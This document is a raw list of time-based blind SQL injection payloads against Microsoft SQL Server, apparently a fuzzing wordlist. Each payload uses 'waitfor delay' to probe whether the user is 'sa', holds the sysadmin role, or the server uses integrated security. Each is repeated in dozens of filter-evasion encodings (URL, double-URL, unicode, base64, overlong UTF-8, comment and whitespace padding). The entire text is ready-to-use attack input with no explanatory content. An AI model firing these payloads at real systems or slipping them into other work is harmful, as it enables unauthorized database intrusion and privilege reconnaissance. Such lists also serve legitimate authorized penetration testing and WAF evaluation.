'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; /*!30660if not(select system_user) <> 'sa' waitfor delay '0:0:2' */--

'; /*!00000if not(select system_user) <> 'sa' waitfor delay '0:0:2' */--

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(SESELECTLECT system_user) <> 'sa' waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AAselect%C0%AAsystem%C0%DFuser%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA%C0%AFsa%C0%AF%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%s%e%l%e%c%t %s%y%s%t%e%m%_%u%s%e%r%) %<%> %'%s%a%' %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not(select/**/system_user)/**/<>/**/'sa'/**/waitfor/**/delay/**/'0:0:2'/**/--

';--nFIMkwXW%0Aif--xGMvUqnKgJyy%0Anot(select--SYwWWR%0Asystem_user)--rYnXFVPor%0A<>--qLePnFvA%0A'sa'--MnbrmDroqY%0Awaitfor--MWMJqMPQ%0Adelay--RygirUbW%0A'0:0:2'--YSEUpaIQ%0A----wtmNbjJo%0A
';%23bgfRhZRMWhBs%0Aif%23PKiVTGPoV%0Anot(select%23dYDQKYoC%0Asystem_user)%23oUgresAZi%0A<>%23XDuuGHMfL%0A'sa'%23PeekSRIZcFJ%0Awaitfor%23vYxPQBAr%0Adelay%23qcXUBE%0A'0:0:2'%23lYrqIGzZCN%0A--%23PYAPACPNPTD%0A
';%23OelqNpM%0Aif%23IdCMmrzkojAW%0Anot(select%23XfknvV%0Asystem_user)%23RBGeodAqJSj%0A<>%23hzUIUB%0A'sa'%23zMDzSJP%0Awaitfor%23DfVjzhi%0Adelay%23TfRfrcQ%0A'0:0:2'%23uXBtbYOJi%0A--%23jKyFhQ%0A
';%01if%08not(select%0Esystem_user)%01<>%0C'sa'%02waitfor%0Bdelay%08'0:0:2'%03--

';%23%0Aif%23%0Anot(select%23%0Asystem_user)%23%0A<>%23%0A'sa'%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%09if%09not(select%0Csystem_user)%0B<>%0C'sa'%0Cwaitfor%0Ddelay%0C'0:0:2'%0D--

';--%0Aif--%0Anot(select--%0Asystem_user)--%0A<>--%0A'sa'--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:2'+--

';%0Cif%0Anot(select%0Csystem_user)%0C<>%0C'sa'%0Dwaitfor%09delay%0D'0:0:2'%09--

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

%bf%27; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

%EF%BC%87; if is_srvrolemember(%EF%BC%87sysadmin%EF%BC%87) > 0 waitfor delay %EF%BC%870:0:2%EF%BC%87 -- 

%00%27; if is_srvrolemember(%00%27sysadmin%00%27) > 0 waitfor delay %00%270:0:2%00%27 -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
%00
JzsgaWYgaXNfc3J2cm9sZW1lbWJlcignc3lzYWRtaW4nKSA+IDAgd2FpdGZvciBkZWxheSAnMDowOjInIC0tIAo=
'; if is_srvrolemember('sysadmin') NOT BETWEEN 0 AND 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

%2527%253B%2520%2569%2566%2520%2569%2573%255F%2573%2572%2576%2572%256F%256C%2565%256D%2565%256D%2562%2565%2572%2528%2527%2573%2579%2573%2561%2564%256D%2569%256E%2527%2529%2520%253E%2520%2530%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%2520%250A
%27%3B%20%69%66%20%69%73%5F%73%72%76%72%6F%6C%65%6D%65%6D%62%65%72%28%27%73%79%73%61%64%6D%69%6E%27%29%20%3E%20%30%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%20%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u0069%u0073%u005F%u0073%u0072%u0076%u0072%u006F%u006C%u0065%u006D%u0065%u006D%u0062%u0065%u0072%u0028%u0027%u0073%u0079%u0073%u0061%u0064%u006D%u0069%u006E%u0027%u0029%u0020%u003E%u0020%u0030%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u0020%u000A
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; /*!30573if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' */-- 

'; /*!00000if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' */-- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

%C0%AF%C0%BB%C0%AAif%C0%AAis%C0%DFsrvrolemember%C0%AA%C0%AFsysadmin%C0%AF%C0%AB%C0%AA%C0%BE%C0%AA0%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%AA%C0%8A
%'%; %i%f %i%s%_%s%r%v%r%o%l%e%m%e%m%b%e%r%(%'%s%y%s%a%d%m%i%n%'%) %> %0 %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%- %

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
 and '0having'='0having'
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
sp_password
';/**/if/**/is_srvrolemember('sysadmin')/**/>/**/0/**/waitfor/**/delay/**/'0:0:2'/**/--/**/

';--GSZHzO%0Aif--UaECuY%0Ais_srvrolemember('sysadmin')--apQIPK%0A>--pyVQrpJjKfX%0A0--vNzAAdAvJ%0Awaitfor--uLpoqaXNQCng%0Adelay--TEtYkvtwGNGq%0A'0:0:2'--GykzwWOlN%0A-- 

';%23OyunYjVyG%0Aif%23FFkFLQkN%0Ais_srvrolemember('sysadmin')%23hgCUAepuxkAx%0A>%23NhAfinsvDyzV%0A0%23UhRZMZQRajg%0Awaitfor%23rsBOeTnH%0Adelay%23JaYCZpJIW%0A'0:0:2'%23VDwsmCAJDko%0A-- 

';%23GNFUMhgIRlxy%0Aif%23EUAMWFq%0Ais_srvrolemember('sysadmin')%23nqWAZo%0A>%23VTjwSq%0A0%23MybvzXyz%0Awaitfor%23aYUNgfW%0Adelay%23VIVKcIVl%0A'0:0:2'%23bHvFjntg%0A-- 

';%0Aif%07is_srvrolemember('sysadmin')%03>%0B0%0Fwaitfor%0Edelay%07'0:0:2'%02--%06

';%23%0Aif%23%0Ais_srvrolemember('sysadmin')%23%0A>%23%0A0%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A-- 

';%0Aif%09is_srvrolemember('sysadmin')%0C>%0D0%0Bwaitfor%0Adelay%09'0:0:2'%0A--%0C

';--%0Aif--%0Ais_srvrolemember('sysadmin')--%0A>--%0A0--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A-- 

';+if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:2'+--+

';%09if%0Ais_srvrolemember('sysadmin')%0A>%0C0%09waitfor%0Ddelay%0D'0:0:2'%0C--%0A

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

%bf%27; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 

%EF%BC%87; if not((select serverproperty(%EF%BC%87isintegratedsecurityonly%EF%BC%87)) <> 1) waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not((select serverproperty(%00%27isintegratedsecurityonly%00%27)) <> 1) waitfor delay %00%270:0:2%00%27 --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KChzZWxlY3Qgc2VydmVycHJvcGVydHkoJ2lzaW50ZWdyYXRlZHNlY3VyaXR5b25seScpKSA8PiAxKSB3YWl0Zm9yIGRlbGF5ICcwOjA6MicgLS0K
'; if not((select serverproperty('isintegratedsecurityonly')) < NOT BETWEEN 0 AND 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2528%2573%2565%256C%2565%2563%2574%2520%2573%2565%2572%2576%2565%2572%2570%2572%256F%2570%2565%2572%2574%2579%2528%2527%2569%2573%2569%256E%2574%2565%2567%2572%2561%2574%2565%2564%2573%2565%2563%2575%2572%2569%2574%2579%256F%256E%256C%2579%2527%2529%2529%2520%253C%253E%2520%2531%2529%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%28%73%65%6C%65%63%74%20%73%65%72%76%65%72%70%72%6F%70%65%72%74%79%28%27%69%73%69%6E%74%65%67%72%61%74%65%64%73%65%63%75%72%69%74%79%6F%6E%6C%79%27%29%29%20%3C%3E%20%31%29%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0073%u0065%u0072%u0076%u0065%u0072%u0070%u0072%u006F%u0070%u0065%u0072%u0074%u0079%u0028%u0027%u0069%u0073%u0069%u006E%u0074%u0065%u0067%u0072%u0061%u0074%u0065%u0064%u0073%u0065%u0063%u0075%u0072%u0069%u0074%u0079%u006F%u006E%u006C%u0079%u0027%u0029%u0029%u0020%u003C%u003E%u0020%u0031%u0029%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; /*!30366if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' */--

'; /*!00000if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' */--

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((SESELECTLECT serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AA%C0%AAselect%C0%AAserverproperty%C0%AA%C0%AFisintegratedsecurityonly%C0%AF%C0%AB%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA1%C0%AB%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%(%s%e%l%e%c%t %s%e%r%v%e%r%p%r%o%p%e%r%t%y%(%'%i%s%i%n%t%e%g%r%a%t%e%d%s%e%c%u%r%i%t%y%o%n%l%y%'%)%) %<%> %1%) %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not((select/**/serverproperty('isintegratedsecurityonly'))/**/<>/**/1)/**/waitfor/**/delay/**/'0:0:2'/**/--

';--nsakWyhq%0Aif--pasATkpCBEBT%0Anot((select--kUiBTOtZs%0Aserverproperty('isintegratedsecurityonly'))--kvROBzu%0A<>--tBJKNVlCjI%0A1)--vQMAxJXLQGnQ%0Awaitfor--uSZAezU%0Adelay--EDrSxKkqy%0A'0:0:2'--PNWjEDecFG%0A----otuPczj%0A
';%23sIgNPBVzd%0Aif%23oNUYuZN%0Anot((select%23rkJyRZ%0Aserverproperty('isintegratedsecurityonly'))%23TvhtsaS%0A<>%23kwPRwdOLtjvB%0A1)%23xUyAlesWK%0Awaitfor%23ndqQEfMVgC%0Adelay%23jODURbBbaph%0A'0:0:2'%23HQYQmeTTG%0A--%23LMhDmDwcw%0A
';%23XZuGCU%0Aif%23DCnPVcVh%0Anot((select%23IXLfLUkYV%0Aserverproperty('isintegratedsecurityonly'))%23rtNAoLpYiVk%0A<>%23ywjnrNwoN%0A1)%23vcHVAYKEiuV%0Awaitfor%23aPdznBH%0Adelay%23GYbygqCktxa%0A'0:0:2'%23tgfrJaznP%0A--%23aFqZxSNT%0A
';%0Cif%08not((select%0Fserverproperty('isintegratedsecurityonly'))%0C<>%0D1)%03waitfor%02delay%03'0:0:2'%08--

';%23%0Aif%23%0Anot((select%23%0Aserverproperty('isintegratedsecurityonly'))%23%0A<>%23%0A1)%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%0Cif%0Cnot((select%0Aserverproperty('isintegratedsecurityonly'))%0A<>%0C1)%0Cwaitfor%0Ddelay%09'0:0:2'%0B--

';--%0Aif--%0Anot((select--%0Aserverproperty('isintegratedsecurityonly'))--%0A<>--%0A1)--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not((select+serverproperty('isintegratedsecurityonly'))+<>+1)+waitfor+delay+'0:0:2'+--

';%0Dif%09not((select%09serverproperty('isintegratedsecurityonly'))%09<>%0D1)%0Cwaitfor%0Cdelay%0D'0:0:2'%0D--

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

%bf%27; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --

%EF%BC%87; if not((select serverproperty(%EF%BC%87isintegratedsecurityonly%EF%BC%87)) <> 0) waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not((select serverproperty(%00%27isintegratedsecurityonly%00%27)) <> 0) waitfor delay %00%270:0:2%00%27 --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KChzZWxlY3Qgc2VydmVycHJvcGVydHkoJ2lzaW50ZWdyYXRlZHNlY3VyaXR5b25seScpKSA8PiAwKSB3YWl0Zm9yIGRlbGF5ICcwOjA6MicgLS0K
'; if not((select serverproperty('isintegratedsecurityonly')) < NOT BETWEEN 0 AND 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2528%2573%2565%256C%2565%2563%2574%2520%2573%2565%2572%2576%2565%2572%2570%2572%256F%2570%2565%2572%2574%2579%2528%2527%2569%2573%2569%256E%2574%2565%2567%2572%2561%2574%2565%2564%2573%2565%2563%2575%2572%2569%2574%2579%256F%256E%256C%2579%2527%2529%2529%2520%253C%253E%2520%2530%2529%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%28%73%65%6C%65%63%74%20%73%65%72%76%65%72%70%72%6F%70%65%72%74%79%28%27%69%73%69%6E%74%65%67%72%61%74%65%64%73%65%63%75%72%69%74%79%6F%6E%6C%79%27%29%29%20%3C%3E%20%30%29%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0073%u0065%u0072%u0076%u0065%u0072%u0070%u0072%u006F%u0070%u0065%u0072%u0074%u0079%u0028%u0027%u0069%u0073%u0069%u006E%u0074%u0065%u0067%u0072%u0061%u0074%u0065%u0064%u0073%u0065%u0063%u0075%u0072%u0069%u0074%u0079%u006F%u006E%u006C%u0079%u0027%u0029%u0029%u0020%u003C%u003E%u0020%u0030%u0029%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; /*!30823if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' */--

'; /*!00000if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' */--

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((SESELECTLECT serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AA%C0%AAselect%C0%AAserverproperty%C0%AA%C0%AFisintegratedsecurityonly%C0%AF%C0%AB%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA0%C0%AB%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%(%s%e%l%e%c%t %s%e%r%v%e%r%p%r%o%p%e%r%t%y%(%'%i%s%i%n%t%e%g%r%a%t%e%d%s%e%c%u%r%i%t%y%o%n%l%y%'%)%) %<%> %0%) %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not((select/**/serverproperty('isintegratedsecurityonly'))/**/<>/**/0)/**/waitfor/**/delay/**/'0:0:2'/**/--

';--VqlICecgBTl%0Aif--iAJneUy%0Anot((select--JVfGmgbeJwzg%0Aserverproperty('isintegratedsecurityonly'))--tvfwLSe%0A<>--SRALmOv%0A0)--ILXaDHpLh%0Awaitfor--zJOlCh%0Adelay--gWbMCNw%0A'0:0:2'--ClQOCw%0A----SxKGlm%0A
';%23ydzPYLuNYoDT%0Aif%23xYTvxRKK%0Anot((select%23GWXAwGUbkD%0Aserverproperty('isintegratedsecurityonly'))%23ynCorMADv%0A<>%23dTNMtYqvp%0A0)%23mEACsxsp%0Awaitfor%23XTrrUqFqIY%0Adelay%23xzUuGXJQawg%0A'0:0:2'%23wCHrHZvEAc%0A--%23eHDDBcQCIK%0A
';%23RQJcyJ%0Aif%23CiskIhvplq%0Anot((select%23ZjICHAGMhR%0Aserverproperty('isintegratedsecurityonly'))%23voWWzqqBbMSB%0A<>%23NGJWeCRBAEv%0A0)%23jxeEGlk%0Awaitfor%23WCYFbG%0Adelay%23NRskohq%0A'0:0:2'%23ygihlWf%0A--%23oCBIfb%0A
';%0Cif%0Enot((select%08serverproperty('isintegratedsecurityonly'))%0F<>%0C0)%0Dwaitfor%0Ddelay%0B'0:0:2'%0F--

';%23%0Aif%23%0Anot((select%23%0Aserverproperty('isintegratedsecurityonly'))%23%0A<>%23%0A0)%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%0Bif%0Bnot((select%09serverproperty('isintegratedsecurityonly'))%0A<>%0B0)%0Bwaitfor%0Bdelay%0C'0:0:2'%0C--

';--%0Aif--%0Anot((select--%0Aserverproperty('isintegratedsecurityonly'))--%0A<>--%0A0)--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not((select+serverproperty('isintegratedsecurityonly'))+<>+0)+waitfor+delay+'0:0:2'+--

';%0Aif%09not((select%0Dserverproperty('isintegratedsecurityonly'))%0C<>%0D0)%0Awaitfor%09delay%0A'0:0:2'%0C--

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

%bf%27; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --

